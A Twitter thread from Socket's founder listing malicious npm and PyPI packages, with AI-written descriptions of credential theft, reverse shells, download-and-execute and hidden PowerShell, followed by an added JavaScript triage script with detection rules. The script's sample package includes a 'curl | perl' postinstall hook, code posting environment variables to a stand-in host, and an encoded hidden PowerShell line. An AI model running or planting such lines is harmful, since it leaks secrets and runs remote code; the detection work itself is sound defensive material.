Feross, Jun 24, 12 tweets
I wish more developers understood the constant stream of malware that is posted to npm, PyPI, and all package managers...

Here's just a taste of some crazy malware Socket identified in the past couple weeks...

All malware descriptions were FULLY WRITTEN by Socket AI.
This code is using curl to send the contents of the file '/etc/passwd' to a remote server. This is a highly suspicious and potentially malicious behavior as it could cause sensitive data to be sent to an attacker's server.

https://t.co/yaxVgzpZEn socket.dev/npm/package/se…
The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.

https://t.co/M7FVhL2kEO socket.dev/npm/package/@u…
The script is using 'curl' to download a Perl script from an external source and then execute it using 'perl'. This behavior is considered highly suspicious and may indicate that a malicious actor is trying to execute code on the system.

https://t.co/02coE3jNMA socket.dev/npm/package/fi…
The script creates a reverse shell, connecting the user's system to a remote IP address, and potentially sends data to an external server, posing a significant security risk.

https://t.co/k1izLodbnr socket.dev/npm/package/12…
The script is obfuscated and dynamically creates functions to collect the user's environment variables and sends them to a remote server.

https://t.co/0DIquPJuht socket.dev/npm/package/li…
The script is running a PowerShell command with a hidden window and an encoded command. This behavior is considered suspicious and could potentially execute malicious code on the system.

https://t.co/kYT0gdkBGd socket.dev/npm/package/py…
This code is malicious and should not be used. Remove it from any system on which it is installed immediately. The remote server should be investigated to determine its legitimacy.

https://t.co/vrjugOkw2D socket.dev/npm/package/js…
This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary [...].

https://t.co/HTXVthFl1o socket.dev/npm/package/ko…
The code appears to be downloading content from an unknown URL, writing it to a file, and potentially executing it. [...] This code should be reviewed and potentially removed.

https://t.co/pDo5ahfI0F socket.dev/npm/package/ya…
@scottinallcaps If interested, you can book time here: socket.dev/demo
Protect your codebase from malicious dependencies by installing Socket in 2 clicks: socket.dev
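The alerts quoted in this thread are all behavioural: a package reads a sensitive file and talks to the network, pipes a download into an interpreter, launches hidden PowerShell, or ships environment variables off-host. The following is an added example (not Socket's code) of how a defender can triage an npm package's install hooks and shipped files for exactly those behaviours; the rule set, file layout and sample package are constructed for illustration.

```javascript
// Added example, not Socket's code: heuristic behavioural triage of an npm
// package. The sample package at the bottom is constructed (inert hosts).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// A rule fires only when every regex in `all` matches the same text.
const RULES = [
  { id: 'passwd-exfil', severity: 'critical',
    why: 'reads /etc/passwd and invokes an HTTP client in the same script',
    all: [/\/etc\/passwd\b/, /\b(curl|wget)\b/] },
  { id: 'download-and-exec', severity: 'critical',
    why: 'pipes downloaded content straight into an interpreter',
    all: [/\b(curl|wget)\b[^|\n]*\|\s*(perl|sh|bash|python3?|node)\b/] },
  { id: 'hidden-encoded-powershell', severity: 'critical',
    why: 'PowerShell with a hidden window and an encoded command',
    all: [/powershell(\.exe)?\b/i, /-w(indowstyle)?\s+hidden\b/i,
          /-e(nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{16,}/i] },
  { id: 'env-exfil', severity: 'high',
    why: 'reads process.env and uses a network API in the same file',
    all: [/process\.env\b/, /\b(https?\.request|fetch|dns\.(resolve|lookup))\b/] },
];

function scanText(text, where) {
  return RULES.filter((r) => r.all.every((re) => re.test(text)))
    .map((r) => ({ rule: r.id, severity: r.severity, where, why: r.why }));
}

// pkg: parsed package.json; files: { path: contents } from the tarball.
function triagePackage(pkg, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (cmd) findings.push(...scanText(cmd, `package.json scripts.${hook}`));
  }
  for (const [path, src] of Object.entries(files)) {
    if (/\.(c?js|mjs|sh|ps1)$/.test(path)) findings.push(...scanText(src, path));
  }
  return findings;
}

// Constructed sample package modelled on the alerts quoted in the thread.
const SAMPLE_PKG = { name: 'example-pkg', scripts: {
  postinstall: 'curl -s https://example.invalid/x.pl | perl', test: 'node test.js' } };
const SAMPLE_FILES = {
  'index.js': "const https = require('https');\nconst body = JSON.stringify(process.env);\n" +
    "https.request({ host: 'example.invalid', method: 'POST' }).end(body);\n",
  'setup.ps1': 'powershell.exe -WindowStyle Hidden -EncodedCommand QUFBQUFBQUFBQUFBQUFBQQ==',
  'lib/util.js': 'module.exports = (a, b) => a + b;\n',
};

function demo() { return triagePackage(SAMPLE_PKG, SAMPLE_FILES); }
console.log(JSON.stringify(demo(), null, 2));
```

The rules are deliberately coarse (a legitimate package can read `process.env` and call `fetch`), so findings are a queue for human review, not a verdict.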
